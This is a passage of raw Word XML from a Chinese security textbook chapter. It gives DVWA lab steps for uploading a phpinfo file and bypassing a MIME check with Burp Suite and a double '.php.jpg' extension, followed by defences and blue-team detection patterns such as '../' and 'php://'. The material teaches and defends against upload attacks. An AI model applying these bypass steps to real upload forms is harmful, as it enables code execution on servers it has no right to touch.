          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">难度下，上传后无需额外配置即可成功，页面提示路径，访问该路径即可看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置信息页面。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证明无过滤下的直接上传危害。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤（Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">难度，绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MIME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">类型检查）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同样准备</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">info.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，但上传时使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拦截请求。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">application/x-php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">image/jpeg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，放行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端只检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MIME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头，因此文件成功保存。访问返回的路径，若看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息页，则绕过成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：能够访问到上传的文件，并执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码。即便该文件只是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出，也已证明代码执行的可能性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能还检查文件扩展名，可尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php.jpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">双重扩展名，或结合后端解析规则。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的某些版本可能需要预先创建上传目录并设置写权限，请参考第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章靶场搭建说明。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">重要提醒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在上述实验中，上传的文件仅为展示代码执行风险的教学示意图（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等简单无害指令），绝非可用于攻击生产系统的武器。读者在实验结束后应及时删除上传文件，并重置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="213"/>
    <w:bookmarkEnd w:id="214"/>
    <w:bookmarkStart w:id="218" w:name="防御对照框-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="215" w:name="路径遍历与文件包含防御"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径遍历与文件包含防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">路径规范化（Canonicalization）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用文件系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将用户输入转换为绝对路径，再检查其前缀是否在允许的目录列表中（白名单方法）。例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getCanonicalPath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">紧随</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">startsWith("/safe/base/")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；PHP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">realpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。禁止直接拼接字符串。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁止远程包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php.ini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include = Off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen = Off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（若业务不需要）；应用层也硬编码仅在指定路径搜索文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">白名单代替黑名单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：维护业务确实需要访问的文件列表，拒绝所有其他输入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务进程以低权限运行，仅能访问特定资源；对敏感文件（如配置、日志）设置独立的文件系统权限。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="215"/>
    <w:bookmarkStart w:id="216" w:name="文件上传防御"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件上传防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">白名单文件类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：仅允许业务必需的类型（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.jpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），而非靠黑名单排除可执行的扩展名。检查时使用服务端确定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MIME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类型（如通过文件内容分析），而不依赖客户端提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">文件重命名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：上传后的文件名由服务器用随机字符串（UUID）或哈希生成，不带用户可控的原始扩展名，避免被直接请求执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">存储隔离与执行禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将上传目录设置在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根目录之外，并通过配置使该目录不解析脚本（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AllowOverride None</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php_admin_value engine off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；Nginx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中禁止对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行）。存储目录挂载独立的卷，避免符号链接攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内容校验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对图像类文件可尝试用图像库重新生成，消除内嵌代码；对文档类可转为独立格式；如有必要，在隔离的沙箱中扫描病毒和恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">访问控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：上传文件的访问应通过代理脚本（检查登录、限流）提供，而非直接通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问物理路径。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="216"/>
    <w:bookmarkStart w:id="217" w:name="蓝队监控"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队监控</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常文件访问监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：部署文件完整性监控（FIM）和访问日志分析，检测对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.ssh/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等敏感目录的访问尝试，或高频率的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用防火墙（WAF）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：配置规则识别路径遍历序列、多层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码、封装器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）等，但应作为纵深防御的一层，不能作为唯一的防护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络与主机层监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器进程对非预期目录的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统调用，或对互联网的异常出站连接（RFI）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="217"/>
    <w:bookmarkEnd w:id="218"/>
    <w:bookmarkStart w:id="219" w:name="习题与靶机迁移"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题与靶机迁移</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
